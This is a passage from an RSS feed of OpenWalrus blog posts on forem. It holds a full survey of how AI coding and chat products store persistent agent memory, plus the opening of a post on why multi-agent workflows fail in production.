&lt;a href="https://refact.ai/blog/2025/1-agent-on-swe-bench-verified-using-claude-4-sonnet/" rel="noopener noreferrer"&gt;Refact.ai SWE-bench&lt;/a&gt;
— when explicit planning helps vs. when it doesn't&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;Less code, more skills&lt;/a&gt; — walrus's design principle&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;How AI agents remember&lt;/a&gt; — our memory survey&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://openwalrus.xyz/docs/walrus/getting-started/installation" rel="noopener noreferrer"&gt;Get started with OpenWalrus →&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>How AI agents remember: a survey of persistent memory</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:53:09 +0000</pubDate>
      <link>https://forem.com/crabtalk/how-ai-agents-remember-a-survey-of-persistent-memory-3m3f</link>
      <guid>https://forem.com/crabtalk/how-ai-agents-remember-a-survey-of-persistent-memory-3m3f</guid>
      <description>&lt;p&gt;AI agents are stateless by default. Every session starts from zero — the context window&lt;br&gt;
fills up, the conversation ends, and everything is gone. But useful agents need to learn.&lt;br&gt;
They need to remember your preferences, your project structure, the mistakes they made&lt;br&gt;
yesterday.&lt;/p&gt;

&lt;p&gt;We surveyed five products — Claude Code, OpenClaw, ChatGPT, Cursor, and&lt;br&gt;
Windsurf — to understand how persistent memory actually works in production. Here's what we learned.&lt;/p&gt;

&lt;h2&gt;
  
  
  A taxonomy of agent memory
&lt;/h2&gt;

&lt;p&gt;Not all memory serves the same purpose. We identified six functional roles that keep&lt;br&gt;
appearing across products, even when they use different names for them.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;What it holds&lt;/th&gt;
&lt;th&gt;Persistence&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Working memory&lt;/td&gt;
&lt;td&gt;Current session context&lt;/td&gt;
&lt;td&gt;Ephemeral&lt;/td&gt;
&lt;td&gt;Chat history in context window&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent profile&lt;/td&gt;
&lt;td&gt;Agent-specific persistent knowledge&lt;/td&gt;
&lt;td&gt;Durable, per-agent&lt;/td&gt;
&lt;td&gt;CLAUDE.md, .cursorrules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User profile&lt;/td&gt;
&lt;td&gt;User preferences, habits, personal info&lt;/td&gt;
&lt;td&gt;Durable, cross-agent&lt;/td&gt;
&lt;td&gt;ChatGPT's "memory" feature&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Episodic memory&lt;/td&gt;
&lt;td&gt;Chronological interaction logs&lt;/td&gt;
&lt;td&gt;Timestamped&lt;/td&gt;
&lt;td&gt;JSONL session journals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Semantic memory&lt;/td&gt;
&lt;td&gt;Searchable knowledge base&lt;/td&gt;
&lt;td&gt;Indexed&lt;/td&gt;
&lt;td&gt;RAG-backed vector store&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Date-anchored memory&lt;/td&gt;
&lt;td&gt;Time-stamped facts that expire&lt;/td&gt;
&lt;td&gt;Temporal&lt;/td&gt;
&lt;td&gt;"User is on vacation until March 15"&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Working memory&lt;/strong&gt; is what most people think of — the chat history sitting in the&lt;br&gt;
context window. It's fast but volatile. When the window fills up, something has to go.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agent profile&lt;/strong&gt; is the agent's persistent identity. Claude Code uses CLAUDE.md files,&lt;br&gt;
Cursor uses &lt;code&gt;.cursorrules&lt;/code&gt;. These are always loaded at session start — they tell the&lt;br&gt;
agent &lt;em&gt;how to behave&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;User profile&lt;/strong&gt; is different from agent profile, though products often conflate them.&lt;br&gt;
Agent profiles are scoped to one agent instance. User profiles span agents — your&lt;br&gt;
timezone, your communication style, your name. ChatGPT's memory feature is user-scoped.&lt;br&gt;
Claude Code's CLAUDE.md is agent-scoped.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Episodic memory&lt;/strong&gt; is the journal. Timestamped session logs — who said what, when,&lt;br&gt;
in what order. Usually stored as JSONL or in a database with temporal indices. Critical&lt;br&gt;
for debugging and context recall across sessions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Semantic memory&lt;/strong&gt; is the searchable layer. Vector embeddings, full-text search indices,&lt;br&gt;
or both. This is where RAG lives — the agent queries for relevant knowledge rather than&lt;br&gt;
loading everything into the prompt.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Date-anchored memory&lt;/strong&gt; is the least common but arguably the most underbuilt. Facts&lt;br&gt;
with expiration dates — your current project deadline, a temporary API key, a colleague's&lt;br&gt;
vacation schedule. Most products store these the same way as permanent facts, which means&lt;br&gt;
they never expire.&lt;/p&gt;

&lt;h2&gt;
  
  
  How five products implement memory
&lt;/h2&gt;

&lt;p&gt;Each product makes different tradeoffs across the memory stack. Here's where&lt;br&gt;
they land:&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The orange bars show &lt;strong&gt;inspectability&lt;/strong&gt; (can you read and edit the memory?) and the&lt;br&gt;
blue bars show &lt;strong&gt;searchability&lt;/strong&gt; (can the agent retrieve relevant memories at scale?).&lt;br&gt;
Claude Code and Cursor maximize human control. OpenClaw maximizes machine retrieval.&lt;br&gt;
ChatGPT scores low on both axes from a developer perspective — it's accessible to&lt;br&gt;
end users but opaque to builders.&lt;/p&gt;

&lt;h3&gt;
  
  
  Claude Code (Anthropic)
&lt;/h3&gt;

&lt;p&gt;Claude Code takes the simplest approach in this survey: &lt;strong&gt;files on disk&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CLAUDE.md&lt;/strong&gt; files act as the primary persistent memory. One per project root,
one global at &lt;code&gt;~/.claude/CLAUDE.md&lt;/code&gt;. Loaded into the system prompt on every session.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auto memory&lt;/strong&gt; accumulates in &lt;code&gt;~/.claude/projects/&amp;lt;project&amp;gt;/memory/&lt;/code&gt; — build
commands, architecture notes, debugging insights, workflow preferences. Written
automatically based on interaction patterns.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Context compaction&lt;/strong&gt; kicks in when the context window fills up. The system
compresses prior messages automatically. Memory files persist across compaction
boundaries.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No RAG, no vector search.&lt;/strong&gt; Memory is loaded directly into the prompt or
read from files. Retrieval is file-path-based, not semantic.&lt;/li&gt;
&lt;li&gt;A growing &lt;strong&gt;third-party ecosystem&lt;/strong&gt; fills the gaps: claude-mem adds semantic
compression, memsearch provides markdown-first indexing, and Basic Memory offers
MCP-based persistent context.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The bet here is on &lt;strong&gt;human readability&lt;/strong&gt;. You can open CLAUDE.md in any text editor,&lt;br&gt;
see exactly what your agent knows, and change it. No database to query, no embeddings&lt;br&gt;
to inspect.&lt;/p&gt;

&lt;h3&gt;
  
  
  OpenClaw
&lt;/h3&gt;

&lt;p&gt;OpenClaw has the most sophisticated retrieval pipeline of the products surveyed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multi-layer architecture&lt;/strong&gt;: conversation history (working memory), long-term
memory store (durable facts), and session indexing (episodic recall).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SQLite + sqlite-vec&lt;/strong&gt; for storage — structured queries via SQL, semantic
similarity via vector embeddings, all in a single file.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hybrid search&lt;/strong&gt; combines cosine similarity (semantic match) with BM25-style
keyword matching. Neither method alone is sufficient — hybrid catches both
conceptual and literal matches.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pre-compaction memory flush&lt;/strong&gt;: before trimming the context window, the agent
is given an explicit turn to extract and persist all important facts. This is the
most interesting pattern in the survey — the agent itself decides what matters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Markdown-first philosophy&lt;/strong&gt; for memory content, with LLM-generated session
slugs for indexing (e.g., "debugging-auth-flow-march-7").&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The pre-compaction flush is worth highlighting. Most systems lose information silently&lt;br&gt;
when compaction happens. OpenClaw turns compaction into an explicit memory-formation event.&lt;/p&gt;

&lt;h3&gt;
  
  
  ChatGPT (OpenAI)
&lt;/h3&gt;

&lt;p&gt;ChatGPT's memory is the most user-facing and the least transparent.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;User-controlled&lt;/strong&gt;: you tell ChatGPT to "remember this" and it does. It also
infers memories automatically from conversations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Proprietary backend&lt;/strong&gt; — no public documentation on storage format, compaction
strategy, or retrieval mechanism.&lt;/li&gt;
&lt;li&gt;Users can &lt;strong&gt;delete individual memories&lt;/strong&gt; or clear all. A "Temporary Chat" mode
disables memory entirely.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tiered persistence&lt;/strong&gt;: Plus and Pro users get longer-term memory. Free users
get lightweight short-term continuity.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The accessibility is unmatched — non-technical users can manage memory through a&lt;br&gt;
simple UI. But there's no programmatic access, no way to inspect the storage layer,&lt;br&gt;
and no portability.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cursor IDE
&lt;/h3&gt;

&lt;p&gt;Cursor treats memory as &lt;strong&gt;configuration, not knowledge&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;.cursorrules&lt;/code&gt;&lt;/strong&gt; (now deprecated) was a plaintext file in the project root
providing persistent instructions — essentially a system prompt extension.&lt;/li&gt;
&lt;li&gt;The replacement, &lt;strong&gt;&lt;code&gt;.cursor/rules/&lt;/code&gt;&lt;/strong&gt;, is a directory of rule files with more
granular control.&lt;/li&gt;
&lt;li&gt;The community-driven &lt;strong&gt;Memory Bank&lt;/strong&gt; pattern pushes this further: hierarchical
rule loading organized by development phase (analysis, planning, creative,
implementation). Only rules relevant to the current phase are loaded.&lt;/li&gt;
&lt;li&gt;No embeddings, no search, no learned facts. Rules are &lt;strong&gt;static instructions&lt;/strong&gt;
written by the developer.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The Memory Bank pattern is telling. Users built an elaborate multi-phase memory&lt;br&gt;
system on top of a tool that only supports flat config files. The demand for real&lt;br&gt;
memory far exceeds what's offered.&lt;/p&gt;

&lt;h3&gt;
  
  
  Windsurf / Codeium
&lt;/h3&gt;

&lt;p&gt;Windsurf adds &lt;strong&gt;automatic memory generation&lt;/strong&gt; on top of manual rules.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The Cascade agent auto-generates memories in &lt;code&gt;~/.codeium/windsurf/memories/&lt;/code&gt;,
capturing coding patterns and project context.&lt;/li&gt;
&lt;li&gt;Memories are &lt;strong&gt;workspace-scoped&lt;/strong&gt; — knowledge from one project doesn't bleed
into another. Reasonable for code agents, but means nothing transfers.&lt;/li&gt;
&lt;li&gt;Can infer agent configuration from &lt;strong&gt;AGENTS.md&lt;/strong&gt; files.&lt;/li&gt;
&lt;li&gt;Enterprise tier adds &lt;strong&gt;system-level rules&lt;/strong&gt; that admins deploy org-wide.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The workspace scoping is a deliberate tradeoff. It prevents context pollution&lt;br&gt;
between projects but also prevents learning that should transfer (your preferred&lt;br&gt;
test framework, your naming conventions, your error-handling patterns).&lt;/p&gt;

&lt;h3&gt;
  
  
  Feature coverage across products
&lt;/h3&gt;

&lt;p&gt;Which memory roles does each product actually implement? The radar chart below&lt;br&gt;
scores each product across all six memory roles.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
OpenClaw dominates episodic and semantic memory — its hybrid search pipeline&lt;br&gt;
covers the most ground. Claude Code has the strongest agent profile support but&lt;br&gt;
almost no semantic recall. ChatGPT leads on user profiles but scores low on&lt;br&gt;
everything developers care about. Cursor is a flat line — strong on agent profile,&lt;br&gt;
near-zero on everything else.&lt;/p&gt;

&lt;p&gt;The scatter chart shows the same data from a different angle — how many memory&lt;br&gt;
roles each product covers (x-axis) vs. how dynamically it learns (y-axis):&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Storage formats: markdown, SQLite, or vectors?
&lt;/h2&gt;

&lt;p&gt;The storage format determines everything downstream — what you can query, what&lt;br&gt;
you can inspect, and what happens when things go wrong.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Product&lt;/th&gt;
&lt;th&gt;Storage&lt;/th&gt;
&lt;th&gt;Search&lt;/th&gt;
&lt;th&gt;Compaction&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Claude Code&lt;/td&gt;
&lt;td&gt;Markdown files&lt;/td&gt;
&lt;td&gt;File path&lt;/td&gt;
&lt;td&gt;Context window auto-compaction&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenClaw&lt;/td&gt;
&lt;td&gt;SQLite + sqlite-vec&lt;/td&gt;
&lt;td&gt;Hybrid (cosine + BM25)&lt;/td&gt;
&lt;td&gt;Pre-compaction flush&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ChatGPT&lt;/td&gt;
&lt;td&gt;Proprietary&lt;/td&gt;
&lt;td&gt;Unknown&lt;/td&gt;
&lt;td&gt;Unknown&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cursor&lt;/td&gt;
&lt;td&gt;Text / Markdown&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Phase-based pruning&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windsurf&lt;/td&gt;
&lt;td&gt;Local files&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Workspace isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mem0 (infra)&lt;/td&gt;
&lt;td&gt;DB-agnostic&lt;/td&gt;
&lt;td&gt;Pluggable&lt;/td&gt;
&lt;td&gt;Multi-stage extraction&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Markdown files&lt;/strong&gt; (Claude Code, Cursor, Windsurf) are human-readable,&lt;br&gt;
git-friendly, and require zero dependencies. You can &lt;code&gt;cat&lt;/code&gt; your agent's memory,&lt;br&gt;
edit it with vim, and commit it alongside your code. But there's no semantic&lt;br&gt;
search — you're limited to what fits in the context window.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SQLite + vectors&lt;/strong&gt; (OpenClaw) gives you structured queries, full-text search&lt;br&gt;
via FTS5, and semantic similarity via embeddings. The cost is opacity — you&lt;br&gt;
need tooling to inspect memories, and the embedding model becomes a dependency.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Proprietary backends&lt;/strong&gt; (ChatGPT) scale in the cloud and abstract&lt;br&gt;
away storage entirely. But your memories aren't portable, inspectable, or&lt;br&gt;
version-controllable.&lt;/p&gt;

&lt;p&gt;The fundamental tradeoff is &lt;strong&gt;inspectability vs. searchability&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Markdown is maximally inspectable but unsearchable at scale. Vector databases are&lt;br&gt;
maximally searchable but opaque. The products developers trust most — Claude Code,&lt;br&gt;
OpenClaw — choose inspectable formats and layer search on top, rather than starting&lt;br&gt;
with an opaque database.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compaction: what happens when the context window fills up
&lt;/h2&gt;

&lt;p&gt;Every agent eventually runs out of context space. What happens next defines&lt;br&gt;
the quality of long-running interactions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Naive truncation&lt;/strong&gt; drops the oldest messages. Simple, but destructive — it&lt;br&gt;
loses critical early context like system prompts and initial instructions. Most&lt;br&gt;
products have moved past this.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;KV cache compaction&lt;/strong&gt; works at the inference layer. &lt;a href="https://arxiv.org/abs/2602.16284" rel="noopener noreferrer"&gt;Recent research&lt;/a&gt; demonstrates&lt;br&gt;
50x context reduction with minimal quality loss by compressing key-value attention&lt;br&gt;
caches mathematically. This is transparent to the application — the model sees a&lt;br&gt;
compressed but semantically equivalent context.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hierarchical summarization&lt;/strong&gt; mirrors human memory: working memory overflows&lt;br&gt;
into episodic logs (timestamped transcripts), which are periodically summarized&lt;br&gt;
into semantic memory (searchable facts). The pipeline looks like:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Anchored iterative summarization&lt;/strong&gt; avoids reprocessing the entire history on&lt;br&gt;
every compaction. Only new message spans are summarized and merged with existing&lt;br&gt;
summaries. This is cheaper and avoids the progressive degradation that comes&lt;br&gt;
from summarizing summaries.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Episode pagination&lt;/strong&gt; segments conversations at natural cognitive boundaries —&lt;br&gt;
topic shifts, tool-use completions, user-initiated breaks. Each episode becomes&lt;br&gt;
an independently retrievable unit, which dramatically improves recall precision&lt;br&gt;
compared to arbitrary chunking.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Pre-compaction flush&lt;/strong&gt; is the most elegant pattern we found. Before trimming&lt;br&gt;
the context window, the agent gets an explicit turn to extract and persist all&lt;br&gt;
important facts. The agent itself decides what matters — not a heuristic, not a&lt;br&gt;
fixed window. OpenClaw implements this, and it's the pattern we're most interested&lt;br&gt;
in adopting.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Research from &lt;a href="https://github.com/mem0ai/mem0" rel="noopener noreferrer"&gt;Mem0&lt;/a&gt; shows that smart compaction&lt;br&gt;
isn't just about saving tokens — it &lt;strong&gt;improves reasoning&lt;/strong&gt;. Their benchmarks&lt;br&gt;
report 5-11% improvements in reasoning tasks and 91% p95 latency reduction&lt;br&gt;
compared to full-context baselines. Compacting intelligently is better than&lt;br&gt;
throwing everything into the prompt.&lt;/p&gt;

&lt;h2&gt;
  
  
  Patterns worth stealing
&lt;/h2&gt;

&lt;p&gt;Five patterns emerged from this survey that we think every agent memory system&lt;br&gt;
should consider.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Memory as a hook, not a hardcoded subsystem.&lt;/strong&gt; OpenClaw implements memory&lt;br&gt;
through extensible interfaces rather than baking storage decisions into the&lt;br&gt;
core. This lets users swap backends without changing agent logic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dual-store architecture.&lt;/strong&gt; Keep a fast, inspectable format (markdown, TOML)&lt;br&gt;
for agent profiles and user preferences. Use a searchable store (SQLite + FTS,&lt;br&gt;
vectors) for episodic and semantic memory. Don't force everything into one format.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Pre-compaction flush.&lt;/strong&gt; Before trimming context, give the agent an explicit&lt;br&gt;
turn to extract and persist important facts. This turns context compaction from&lt;br&gt;
a lossy operation into a memory-formation event.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Profile vs. recall separation.&lt;/strong&gt; Agent profiles (always-loaded identity) and&lt;br&gt;
recallable knowledge (searched on demand) serve different purposes. Conflating&lt;br&gt;
the two — loading everything into the prompt or searching everything on demand&lt;br&gt;
— creates either bloated prompts or slow retrieval. The best systems separate&lt;br&gt;
these concerns explicitly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Human-readable by default.&lt;/strong&gt; Every product that gained developer trust stores&lt;br&gt;
memory in formats humans can read and edit. Opaque databases create anxiety.&lt;br&gt;
Even when you add a searchable layer, the canonical format should be something&lt;br&gt;
you can open in a text editor.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Temporal knowledge graphs.&lt;/strong&gt; Pure vector retrieval loses relationships and&lt;br&gt;
time. A graph where entities are nodes and facts are edges — with timestamps&lt;br&gt;
tracking when each fact was true, not just when it was stored — outperforms&lt;br&gt;
flat RAG on temporal reasoning tasks. &lt;a href="https://arxiv.org/abs/2501.13956" rel="noopener noreferrer"&gt;Zep's research&lt;/a&gt;&lt;br&gt;
shows 18.5% higher accuracy and ~90% lower latency compared to vector-only&lt;br&gt;
baselines on complex temporal queries. The key is bi-temporal tracking:&lt;br&gt;
separating &lt;em&gt;when a fact was recorded&lt;/em&gt; from &lt;em&gt;when it was actually true&lt;/em&gt;. This&lt;br&gt;
is how "user is on vacation until March 15" can auto-expire without manual&lt;br&gt;
cleanup.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;This survey raised more questions than it answered. Here are the ones&lt;br&gt;
we keep coming back to.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can one storage layer do it all?&lt;/strong&gt; Markdown is inspectable but&lt;br&gt;
unsearchable. Vector databases are searchable but opaque. Every product&lt;br&gt;
picks a side or bolts one onto the other. Is there a single storage&lt;br&gt;
primitive that gives you both — human-readable &lt;em&gt;and&lt;/em&gt; semantically&lt;br&gt;
searchable — without the complexity of maintaining two separate systems?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should memory be a graph?&lt;/strong&gt; Flat key-value memories lose relationships.&lt;br&gt;
"Alice works on Project X" and "Project X uses Rust" are two disconnected&lt;br&gt;
facts in a vector store — but a graph trivially connects them. Zep's&lt;br&gt;
research shows 18.5% accuracy gains from graph-based retrieval on temporal&lt;br&gt;
queries. But graphs add complexity. Where's the crossover point where the&lt;br&gt;
complexity pays for itself?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Who decides what to remember?&lt;/strong&gt; Most products use heuristics or let&lt;br&gt;
users explicitly say "remember this." OpenClaw's pre-compaction flush&lt;br&gt;
is more interesting — the agent itself decides what matters before context&lt;br&gt;
is trimmed. But agent-driven memory formation introduces a new failure&lt;br&gt;
mode: the agent might remember the wrong things, or forget the right ones.&lt;br&gt;
How do you evaluate memory quality?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How should memories expire?&lt;/strong&gt; Date-anchored memory is the most&lt;br&gt;
underbuilt category in this survey. "User is on vacation until March 15"&lt;br&gt;
should auto-expire. But most systems store it identically to permanent&lt;br&gt;
facts. Bi-temporal tracking (separating when a fact was recorded from&lt;br&gt;
when it was true) solves this in theory — but no product we surveyed&lt;br&gt;
implements it well in practice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can memory transfer across agents?&lt;/strong&gt; Cursor and Windsurf scope memory&lt;br&gt;
to a single workspace. Claude Code scopes to a project directory. ChatGPT&lt;br&gt;
scopes to a user but not to a task. None of these scoping models feel&lt;br&gt;
right. Your preferred test framework should follow you everywhere. Your&lt;br&gt;
current project's auth implementation should not.&lt;/p&gt;

&lt;p&gt;We wrote about how we're approaching these questions in&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;Graph + vector: how OpenWalrus agents remember&lt;/a&gt;.&lt;br&gt;
If you're building agent memory systems, we'd love to compare notes —&lt;br&gt;
open an issue on &lt;a href="https://github.com/openwalrus/walrus" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt; or find&lt;br&gt;
us in the discussions.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Why multi-agent workflows fail in production</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:52:27 +0000</pubDate>
      <link>https://forem.com/crabtalk/why-multi-agent-workflows-fail-in-production-5d2a</link>
      <guid>https://forem.com/crabtalk/why-multi-agent-workflows-fail-in-production-5d2a</guid>
      <description>&lt;p&gt;Multi-agent sounds like the obvious answer: parallelize work, specialize agents,&lt;br&gt;
go faster. And for demos, it works — you can show three agents collaborating on&lt;br&gt;
a feature and it looks impressive.&lt;/p&gt;

&lt;p&gt;In production, the failures are consistent enough that Cognition — the team behind&lt;br&gt;
Devin — published a post titled&lt;br&gt;
&lt;a href="https://cognition.ai/blog/dont-build-multi-agents" rel="noopener noreferrer"&gt;Don't Build Multi-Agents&lt;/a&gt;.&lt;br&gt;
The GitHub blog ran&lt;br&gt;
&lt;a href="https://github.blog/ai-and-ml/generative-ai/multi-agent-workflows-often-fail-heres-how-to-engineer-ones-that-dont/" rel="noopener noreferrer"&gt;Multi-agent workflows often fail. Here's how to engineer ones that don't.&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These aren't fringe complaints. They're structural.&lt;/p&gt;

&lt;h2&gt;
  
  
  Context doesn't travel
&lt;/h2&gt;

&lt;p&gt;The foundational problem: each subagent starts fresh. The only information that&lt;br&gt;
passes between agents is the task prompt string. Everything the parent agent&lt;br&gt;
discovered — the codebase structure, constraints, decisions already made — has&lt;br&gt;
to be re-communicated explicitly or re-discovered from scratch.&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://code.claude.com/docs/en/sub-agents" rel="noopener noreferrer"&gt;Claude Code docs&lt;/a&gt; acknowledge this&lt;br&gt;
directly:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Subagents might miss the strategic goal or important constraints known to&lt;br&gt;
the parent agent, leading to solutions that are technically correct but not&lt;br&gt;
perfectly aligned with the user's original intent."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;In practice this plays out as "context amnesia." One documented case: a user asked&lt;br&gt;
Claude Code to fix failing tests and it repeatedly spawned subagents for work that&lt;br&gt;
could have been done in the main context — burning through tokens with no benefit&lt;br&gt;
because each subagent re-explored files the parent already understood.&lt;br&gt;
&lt;a href="https://github.com/anthropics/claude-code/issues/11712" rel="noopener noreferrer"&gt;GitHub issue #11712&lt;/a&gt;&lt;br&gt;
captures a related failure: when agents are resumed, they lose the user prompt that&lt;br&gt;
initiated the resumption, so the resumed agent lacks the context that explains why&lt;br&gt;
it exists.&lt;/p&gt;

&lt;p&gt;The community workaround is "Main Agent as Project Manager with State Awareness":&lt;br&gt;
the parent agent maintains a shared context document and explicitly passes relevant&lt;br&gt;
state to each subagent's prompt. This works, but it's manual prompt engineering —&lt;br&gt;
the developer is doing the coordination work that the system should handle.&lt;/p&gt;

&lt;h2&gt;
  
  
  Parallel agents conflict
&lt;/h2&gt;

&lt;p&gt;When agents run in parallel, they make independent decisions about shared state.&lt;br&gt;
&lt;a href="https://cognition.ai/blog/dont-build-multi-agents" rel="noopener noreferrer"&gt;Cognition's analysis&lt;/a&gt; makes the&lt;br&gt;
problem concrete:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"If a task is 'build a Flappy Bird clone' divided into subtasks, one subagent&lt;br&gt;
might build a Super Mario Bros. background while another builds an incompatible&lt;br&gt;
bird, leaving the final agent to combine these miscommunications."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The GitHub Blog identifies the systemic version of this:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Agents may close issues that other agents just opened, or ship changes that fail&lt;br&gt;
downstream checks they didn't know existed, because agents make implicit assumptions&lt;br&gt;
about state, ordering, and validation without explicit instructions."&lt;/p&gt;
&lt;/blockquote&gt;

